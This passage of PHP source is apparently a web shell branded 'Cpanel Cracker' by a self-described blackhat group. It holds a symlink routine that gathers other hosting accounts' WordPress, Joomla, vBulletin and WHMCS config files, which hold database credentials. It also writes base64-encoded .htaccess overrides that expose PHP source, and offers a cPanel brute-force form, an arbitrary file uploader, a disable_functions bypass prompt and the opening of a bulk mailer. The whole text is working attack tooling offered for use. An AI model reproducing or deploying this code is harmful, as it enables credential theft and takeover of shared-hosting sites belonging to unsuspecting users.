fclose($file);
$htaccess =
'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
$file = fopen(".htaccess","w+");
$write = fwrite ($file ,base64_decode($htaccess));
echo "<hr><center><b>DONE!";
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}
if($_POST['mendapatkan']=='passwd'){
@set_magic_quotes_runtime(0);
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$fn = $_POST['foldername'];
//all function here

function syml($usern,$pdomain)
 {
  symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
 }

    $d0mains = @file("/etc/named.conf");

    if($d0mains)
    {
     mkdir($fn);
     chdir($fn);

     foreach($d0mains as $d0main)
     {
      if(eregi("zone",$d0main))
      {
       preg_match_all('#zone "(.*)"#', $d0main, $domains);
       flush();

       if(strlen(trim($domains[1][0])) > 2)
       {
        $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

        syml($user['name'],$domains[1][0]);
       }
      }
     }
     echo "<center><font color=lime size=3>[ Done ]</font></center>";
     echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
    }
    else
    {
     mkdir($fn);
     chdir($fn);
     $temp = "";
     $val1 = 0;
     $val2 = 1000;
     for(;$val1 <= $val2;$val1++)
     {
      $uid = @posix_getpwuid($val1);
      if ($uid)
       $temp .= join(':',$uid)."\n";
      }
      echo '<br/>';
      $temp = trim($temp);

      $file5 = fopen("test.txt","w");
      fputs($file5,$temp);
      fclose($file5);

$htaccess =
'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
';
$file = fopen(".htaccess","w+");
$write = fwrite ($file ,base64_decode($htaccess));

      $file = fopen("test.txt", "r") or exit("Unable to open file!");
      while(!feof($file))
      {
      $s = fgets($file);
      $matches = array();
      $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
      $matches = str_replace("home/","",$matches[1]);
      if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
       continue;
      syml($matches,$matches);
      }
     fclose($file);
     echo "</table>";
     unlink("test.txt");
     echo "<center><font color=lime size=3>[ Done ]</font></center>";
     echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
    }
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";
exit;
}
?>
<form method="POST" target="_blank">
 <strong>
<input name="page" type="hidden" value="find"><table>
    </strong><br><br><center><font size="3" align="center" style="italic" color="#00ff00">+--=[ Cpanel BruteForce ]=--+</font></center><br>
    <table width="600" border="0" class="tabnet" cellpadding="3" cellspacing="1" align="center">
 <tr>
 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
 <center><b><font size="3" style="italic" color="#00ff00">[ Cpanel Brute Force ]</font></b></center></td></tr>
    <tr>
    <td>
    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
 <strong>Username List :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
 <strong>Password List :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
 <strong>Type :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <span class="style2"><strong>Simple : </strong> </span>
 <strong>
 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
    <font class="style2"><strong>/etc/passwd : </strong> </font>
 <strong>
 <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
 </strong>
 </span>
    </td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class ='inputzbut' type="submit" value="Start">
    </strong>
    </td>
    <tr>
</form>
<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Get Config ]</strong></center></td>
        </tr>
<form method="POST" target="_blank">
 <strong>
<input name="mendapatkan" type="hidden" value="passwd">
    </strong>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="foldername" type="text"></strong></td>
 </strong>
    </td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
    </strong>
    </td>
    <tr>
</form>
<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Get Wordlist ]</strong></center></td>
        </tr>
<form method="POST" target="_blank">
 <strong>
<input name="pass" type="hidden" value="password">
    </strong>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="url" type="text" value="http://www."></strong></td>
 </strong>
    </td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
    </strong>
    </td>
    <tr>
</form>
<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Info
 Security ]</strong></center></td>
        </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
 <strong>
<?php
$safe_mode = ini_get('safe_mode');
if($safe_mode=='1')
{
echo 'ON';
}else{
echo 'OFF';
}

?>
 </strong>
 </td>
        </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
 <strong>
<form method="POST" target="_blank">
 <strong>
<input name="matikan" type="hidden" value="sekatan">
    </strong>

<?php
if(''==($func=@ini_get('disable_functions')))
{
echo "<font color=#00ff00>No Security for Function</font></b>";
}else{
echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
echo "<font color=red>$func</font></b>";
echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
    </strong>
    </td></tr>';
}
?></strong></td></tr></table></table></table>
<?
break;

#########################bds

case '':

?><?php

break;


// Uploader
case 'uploader':

echo '<center><b>+--=[ Uploader ]=--+</b><br><br><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
if( $_POST['_upl'] == "Upload" ) {
 if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana"

size="1"><font color="white"> Done !!</font><br>'; }
 else { echo '<font color="#FF0000">Failed :( </font></p>
 </td></table></tr>

'; }
}
break;

}}
?><br><br><br><center><form action='' method='post'>
<table class='tabnet' style='width:650px;' border=''>
<th colspan=10>Security Info</th><tr>
<td>System </td>
<td><?php
echo php_uname();?></td>
</tr>
 <tr>
    <td valign="top" bgcolor="" style="width: 139px">Safe Mode</td>
    <td valign="top" bgcolor="" colspan="5">
<?php
$safe_mode = ini_get('safe_mode');
if($safe_mode=='1')
{
echo 'ON';
}else{
echo 'OFF';
}

?>
 </td>
        </tr>
       <tr>
    <td valign="top" bgcolor="" style="width: 139px">Desible Function</td>
    <td valign="top" bgcolor="" colspan="5">

<form method="POST" target="_blank">

<input name="matikan" type="hidden" value="sekatan">


<?php
if(''==($func=@ini_get('disable_functions')))
{
echo "<font color=#00ff00>No Security for Function</font></b>";
}else{
echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
echo "<font color=red>$func</font></b>";
echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
    </td></tr>';
}
?><tr>

</table></form></center>
<center><br><br><b><div class="info">-=[ Cpanel Cracker by <span class="gaya"><a href="http://www.facebook.com/rsby07">Pekalongan Blackhat</a></span> ]=-</div>
<div class="jaya">  &copy; 2016 Pekalongan Blackhat</div></center></b><br><br>

</body></html>
<?php ignore_user_abort();
set_time_limit(0);
function enviando() {
    $msg = 1;
    $de[1] = $_POST['de'];
    $nome[1] = $_POST['nome'];
    $assunto[1] = $_POST['assunto'];
    $mensagem[1] = $_POST['mensagem'];
    $mensagem[1] = stripslashes($mensagem[1]);
    $emails = $_POST['emails'];
    $emails2 = htmlspecialchars($_POST['emails']);
    $para = explode("
", $emails);
    $n_emails = count($para);
    $sv = $_SERVER['SERVER_NAME'];
    $en = $_SERVER['REQUEST_URI'];
    $k88 = @$_SERVER["HTTP_REFERER"];
    $fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>" . $emails2 . "</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>" . $mensagem[1] . "</TEXTAREA></p>";
    $vai = $_POST['vai'];
    if ($vai) {
        for ($set = 0;$set < $n_emails;$set++) {
            if ($set == 0) {
                $headers = "MIME-Version: 1.0
";
                $headers.= "Content-type: text/html; charset=iso-8859-1
